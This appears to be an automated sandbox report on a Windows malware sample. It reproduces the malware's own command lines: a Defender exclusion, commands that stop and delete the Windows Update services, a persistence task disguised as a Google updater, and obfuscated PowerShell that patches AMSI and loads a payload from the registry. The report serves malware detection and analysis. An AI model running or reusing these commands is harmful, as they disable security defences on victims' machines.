8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a

General

Target

File.exe
Size

4.0MB
MD5

f74ccaec9935cca19122478058c39f79
SHA1

5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527
SHA256

8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a
SHA512

2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Executes dropped EXE 2 IoCs

Processes:

[New]344334.exeger.exe

pid process

1060 [New]344334.exe
1112 ger.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

3740 takeown.exe
2600 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1060	[New]344334.exe
1112	ger.exe

pid	process
3740	takeown.exe
2600	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

[New]344334.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	[New]344334.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

3740 takeown.exe
2600 icacls.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ip-api.com

pid	process
3740	takeown.exe
2600	icacls.exe

flow	ioc
6	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

Processes:

ger.exe[New]344334.exe

description	pid	process	target process
PID 1112 set thread context of 1812	1112	ger.exe	AppLaunch.exe
PID 1060 set thread context of 1408	1060	[New]344334.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3840 schtasks.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1472 reg.exe
1108 reg.exe
372 reg.exe
2796 reg.exe
3476 reg.exe
3768 reg.exe
3472 reg.exe
2732 reg.exe
1580 reg.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe[New]344334.exe

pid process

4392 powershell.exe
4392 powershell.exe
1060 [New]344334.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeAppLaunch.exe[New]344334.exe

description pid process

Token: SeDebugPrivilege 4392 powershell.exe
Token: SeDebugPrivilege 1812 AppLaunch.exe
Token: SeDebugPrivilege 1060 [New]344334.exe

pid	process
3840	schtasks.exe

pid	process
1472	reg.exe
1108	reg.exe
372	reg.exe
2796	reg.exe
3476	reg.exe
3768	reg.exe
3472	reg.exe
2732	reg.exe
1580	reg.exe

pid	process
4392	powershell.exe
4392	powershell.exe
1060	[New]344334.exe

description	pid	process
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeDebugPrivilege	1812	AppLaunch.exe
Token: SeDebugPrivilege	1060	[New]344334.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

File.exeger.exe[New]344334.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2736 wrote to memory of 1060	2736	File.exe	[New]344334.exe
PID 2736 wrote to memory of 1060	2736	File.exe	[New]344334.exe
PID 2736 wrote to memory of 1112	2736	File.exe	ger.exe
PID 2736 wrote to memory of 1112	2736	File.exe	ger.exe
PID 2736 wrote to memory of 1112	2736	File.exe	ger.exe
PID 1112 wrote to memory of 1812	1112	ger.exe	AppLaunch.exe
PID 1112 wrote to memory of 1812	1112	ger.exe	AppLaunch.exe
PID 1112 wrote to memory of 1812	1112	ger.exe	AppLaunch.exe
PID 1112 wrote to memory of 1812	1112	ger.exe	AppLaunch.exe
PID 1112 wrote to memory of 1812	1112	ger.exe	AppLaunch.exe
PID 1060 wrote to memory of 4124	1060	[New]344334.exe	cmd.exe
PID 1060 wrote to memory of 4124	1060	[New]344334.exe	cmd.exe
PID 4124 wrote to memory of 4392	4124	cmd.exe	powershell.exe
PID 4124 wrote to memory of 4392	4124	cmd.exe	powershell.exe
PID 1060 wrote to memory of 4888	1060	[New]344334.exe	cmd.exe
PID 1060 wrote to memory of 4888	1060	[New]344334.exe	cmd.exe
PID 4888 wrote to memory of 4528	4888	cmd.exe	sc.exe
PID 4888 wrote to memory of 4528	4888	cmd.exe	sc.exe
PID 4888 wrote to memory of 864	4888	cmd.exe	sc.exe
PID 4888 wrote to memory of 864	4888	cmd.exe	sc.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 4888 wrote to memory of 3284	4888	cmd.exe	sc.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 4888 wrote to memory of 3284	4888	cmd.exe	sc.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 1060 wrote to memory of 1408	1060	[New]344334.exe	conhost.exe
PID 4888 wrote to memory of 4520	4888	cmd.exe	sc.exe
PID 4888 wrote to memory of 4520	4888	cmd.exe	sc.exe
PID 4888 wrote to memory of 4904	4888	cmd.exe	sc.exe
PID 4888 wrote to memory of 4904	4888	cmd.exe	sc.exe
PID 4888 wrote to memory of 2796	4888	cmd.exe	reg.exe
PID 4888 wrote to memory of 2796	4888	cmd.exe	reg.exe
PID 4888 wrote to memory of 1580	4888	cmd.exe	reg.exe
PID 4888 wrote to memory of 1580	4888	cmd.exe	reg.exe
PID 4888 wrote to memory of 1472	4888	cmd.exe	reg.exe
PID 4888 wrote to memory of 1472	4888	cmd.exe	reg.exe
PID 1060 wrote to memory of 2416	1060	[New]344334.exe	cmd.exe
PID 1060 wrote to memory of 2416	1060	[New]344334.exe	cmd.exe
PID 4888 wrote to memory of 1108	4888	cmd.exe	reg.exe
PID 4888 wrote to memory of 1108	4888	cmd.exe	reg.exe
PID 2416 wrote to memory of 3840	2416	cmd.exe	schtasks.exe
PID 2416 wrote to memory of 3840	2416	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2736

C:\Users\Admin\AppData\Roaming\[New]344334.exe
C:\Users\Admin\AppData\Roaming\[New]344334.exe
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
3⤵
- Suspicious use of WriteProcessMemory
PID:4124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:4528

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:864

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:3284

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:4520

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:4904

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:2796

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1580

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:1472

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:3476

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1108

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3740

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2600

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3768

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3472

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2732

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:372

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1008

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:2684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:2116

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:4132

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:2184

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:1408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2416

C:\Users\Admin\AppData\Roaming\ger.exe
C:\Users\Admin\AppData\Roaming\ger.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
1⤵
- Creates scheduled task(s)
PID:3840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lVTIsoRZRqKU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oNtXvxywUVRgJv,[Parameter(Position=1)][Type]$rKtabXulif)$zFGApgSdGBc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$zFGApgSdGBc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$oNtXvxywUVRgJv).SetImplementationFlags('Runtime,Managed');$zFGApgSdGBc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$rKtabXulif,$oNtXvxywUVRgJv).SetImplementationFlags('Runtime,Managed');Write-Output $zFGApgSdGBc.CreateType();}$JhwOJVEAiVVwR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$xOfddbeoFqhbay=$JhwOJVEAiVVwR.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DYGbAdGLupiEkdXSGOb=lVTIsoRZRqKU @([String])([IntPtr]);$sVLaknzcJUuGExbgYQpIic=lVTIsoRZRqKU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ilvMzbTfdKj=$JhwOJVEAiVVwR.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$rvcBGlJtehUFtV=$xOfddbeoFqhbay.Invoke($Null,@([Object]$ilvMzbTfdKj,[Object]('Load'+'LibraryA')));$yCNifzSrkWPPrCwvG=$xOfddbeoFqhbay.Invoke($Null,@([Object]$ilvMzbTfdKj,[Object]('Vir'+'tual'+'Pro'+'tect')));$egncJue=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rvcBGlJtehUFtV,$DYGbAdGLupiEkdXSGOb).Invoke('a'+'m'+'si.dll');$TxOxABytDoWgRqiaO=$xOfddbeoFqhbay.Invoke($Null,@([Object]$egncJue,[Object]('Ams'+'iSc'+'an'+'Buffer')));$uNYhusJwqL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yCNifzSrkWPPrCwvG,$sVLaknzcJUuGExbgYQpIic).Invoke($TxOxABytDoWgRqiaO,[uint32]8,4,[ref]$uNYhusJwqL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TxOxABytDoWgRqiaO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yCNifzSrkWPPrCwvG,$sVLaknzcJUuGExbgYQpIic).Invoke($TxOxABytDoWgRqiaO,[uint32]8,0x20,[ref]$uNYhusJwqL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
1⤵
PID:1800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:qphSYtDgPUaQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pzBvKOYRmCWSDL,[Parameter(Position=1)][Type]$EFAgYYdLQk)$LHrGksefxuy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LHrGksefxuy.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$pzBvKOYRmCWSDL).SetImplementationFlags('Runtime,Managed');$LHrGksefxuy.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$EFAgYYdLQk,$pzBvKOYRmCWSDL).SetImplementationFlags('Runtime,Managed');Write-Output $LHrGksefxuy.CreateType();}$UklPrTtCvXAKE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$bFZCgPJLQpMWSL=$UklPrTtCvXAKE.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qjwnZVgfYGEyIpNUFFm=qphSYtDgPUaQ @([String])([IntPtr]);$IAgXyeDeeKECVmKCzpfTCx=qphSYtDgPUaQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fubcAluVegA=$UklPrTtCvXAKE.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$bpUYEuNEPdZgDQ=$bFZCgPJLQpMWSL.Invoke($Null,@([Object]$fubcAluVegA,[Object]('Load'+'LibraryA')));$zjogMWqNOZffxSuYf=$bFZCgPJLQpMWSL.Invoke($Null,@([Object]$fubcAluVegA,[Object]('Vir'+'tual'+'Pro'+'tect')));$kONiRRv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bpUYEuNEPdZgDQ,$qjwnZVgfYGEyIpNUFFm).Invoke('a'+'m'+'si.dll');$ygoYMPfnumwIUWRaB=$bFZCgPJLQpMWSL.Invoke($Null,@([Object]$kONiRRv,[Object]('Ams'+'iSc'+'an'+'Buffer')));$eUgBtXLZAE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zjogMWqNOZffxSuYf,$IAgXyeDeeKECVmKCzpfTCx).Invoke($ygoYMPfnumwIUWRaB,[uint32]8,4,[ref]$eUgBtXLZAE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$ygoYMPfnumwIUWRaB,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zjogMWqNOZffxSuYf,$IAgXyeDeeKECVmKCzpfTCx).Invoke($ygoYMPfnumwIUWRaB,[uint32]8,0x20,[ref]$eUgBtXLZAE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
1⤵
PID:1860

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6bf855c0-4fdc-4af9-90b2-9bb7e4105660}
1⤵
PID:4644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\[New]344334.exe
Filesize
216.7MB

MD5
4c8170e025715b8a9b7138fcab2f2136

SHA1
fc913d276bab173ef244b7c14b3944af1272a5e8

SHA256
926ad6cb6c78a443dcfd64c7ad79284586971b0790c1216c930d9f832db301ca

SHA512
ce46c4eac110bb0dbf757c6e60b37a7eb09fafe76c734567e02e3e6c0bf8a0aeddf1012969de178c79abd5d9850d834a30e07f144f26e544d3d6c26c9b519ff3

Download Submit
C:\Users\Admin\AppData\Roaming\[New]344334.exe
Filesize
218.2MB

MD5
cdd91fb1232cb1e2bd51e5d9af14c2b0

SHA1
a8761ce93218ed85160baf2d8d18ffe54889ad94

SHA256
4634c002868ec687c62c013799fd18a3ad9854c3542a4863014ed7c5dc27b7c4

SHA512
b886db275eacc66f3315cd88fb889f2bbfc7cbece391baeccd454a7cc6e4ba8fb5dfccd9b026b042ebfc582f1b71e9be83147087f8b621671668ae9c45dde87b

Download Submit
C:\Users\Admin\AppData\Roaming\ger.exe
Filesize
1.9MB

MD5
ebc48d85bce66e7534e695c2eb990fc7

SHA1
de42ec460cbcee1d8d1629d41d0764eb16799361

SHA256
32fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c

SHA512
da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8

Download Submit
C:\Users\Admin\AppData\Roaming\ger.exe
Filesize
1.9MB

MD5
ebc48d85bce66e7534e695c2eb990fc7

SHA1
de42ec460cbcee1d8d1629d41d0764eb16799361

SHA256
32fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c

SHA512
da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8

Download Submit
memory/372-185-0x0000000000000000-mapping.dmp

Download
memory/604-204-0x00007FFE32050000-0x00007FFE32060000-memory.dmp

Filesize
64KB

Download
memory/864-158-0x0000000000000000-mapping.dmp

Download
memory/1008-186-0x0000000000000000-mapping.dmp

Download
memory/1060-135-0x0000000000D80000-0x0000000000FC8000-memory.dmp

Filesize
2.3MB

Download
memory/1060-136-0x00007FFE533D0000-0x00007FFE53E91000-memory.dmp

Filesize
10.8MB

Download
memory/1060-130-0x0000000000000000-mapping.dmp

Download
memory/1060-156-0x0000000003B60000-0x0000000003B72000-memory.dmp

Filesize
72KB

Download
memory/1108-171-0x0000000000000000-mapping.dmp

Download
memory/1112-141-0x0000000000BC0000-0x0000000000D9D000-memory.dmp

Filesize
1.9MB

Download
memory/1112-133-0x0000000000000000-mapping.dmp

Download
memory/1408-169-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1408-164-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1408-162-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1408-161-0x0000000140002348-mapping.dmp

Download
memory/1408-160-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1472-168-0x0000000000000000-mapping.dmp

Download
memory/1580-167-0x0000000000000000-mapping.dmp

Download
memory/1800-197-0x00007FFE71E60000-0x00007FFE71F1E000-memory.dmp

Filesize
760KB

Download
memory/1800-195-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmp

Filesize
2.0MB

Download
memory/1800-189-0x00007FFE71E60000-0x00007FFE71F1E000-memory.dmp

Filesize
760KB

Download
memory/1800-188-0x00007FFE71FD0000-0x00007FFE721C5000-memory.dmp

Filesize
2.0MB

Download
memory/1800-177-0x00007FFE533D0000-0x00007FFE53E91000-memory.dmp

Filesize
10.8MB

Download
memory/1812-150-0x0000000004E40000-0x0000000004EA6000-memory.dmp

Filesize
408KB

Download
memory/1812-142-0x0000000000000000-mapping.dmp

Download
memory/1812-154-0x0000000005A70000-0x0000000005B02000-memory.dmp

Filesize
584KB

Download
memory/1812-153-0x0000000005F20000-0x00000000064C4000-memory.dmp

Filesize
5.6MB

Download
memory/1812-143-0x00000000005D0000-0x00000000005F2000-memory.dmp

Filesize
136KB

Download
memory/1860-180-0x0000000003BD0000-0x0000000003C36000-memory.dmp

Filesize
408KB

Download
memory/1860-181-0x0000000004B00000-0x0000000004B1E000-memory.dmp

Filesize
120KB

Download
memory/1860-176-0x00000000034F0000-0x0000000003526000-memory.dmp

Filesize
216KB

Download
memory/1860-178-0x0000000003CC0000-0x00000000042E8000-memory.dmp

Filesize
6.2MB

Download
memory/1860-179-0x0000000003AB0000-0x0000000003AD2000-memory.dmp

Filesize
136KB

Download
memory/2116-200-0x0000000000000000-mapping.dmp

Download
memory/2184-203-0x0000000000000000-mapping.dmp

Download
memory/2416-170-0x0000000000000000-mapping.dmp

Download
memory/2600-175-0x0000000000000000-mapping.dmp

Download
memory/2684-187-0x0000000000000000-mapping.dmp

Download
memory/2732-184-0x0000000000000000-mapping.dmp

Download
memory/2796-166-0x0000000000000000-mapping.dmp

Download
memory/3284-159-0x0000000000000000-mapping.dmp

Download
memory/3472-183-0x0000000000000000-mapping.dmp

Download
memory/3476-173-0x0000000000000000-mapping.dmp

Download
memory/3740-174-0x0000000000000000-mapping.dmp

Download
memory/3768-182-0x0000000000000000-mapping.dmp

Download
memory/3840-172-0x0000000000000000-mapping.dmp

Download
memory/4124-147-0x0000000000000000-mapping.dmp

Download
memory/4132-202-0x0000000000000000-mapping.dmp

Download
memory/4392-151-0x00007FFE533D0000-0x00007FFE53E91000-memory.dmp

Filesize
10.8MB

Download
memory/4392-152-0x000001E67F150000-0x000001E67F172000-memory.dmp

Filesize
136KB

Download
memory/4392-149-0x0000000000000000-mapping.dmp

Download
memory/4520-163-0x0000000000000000-mapping.dmp

Download
memory/4528-157-0x0000000000000000-mapping.dmp

Download
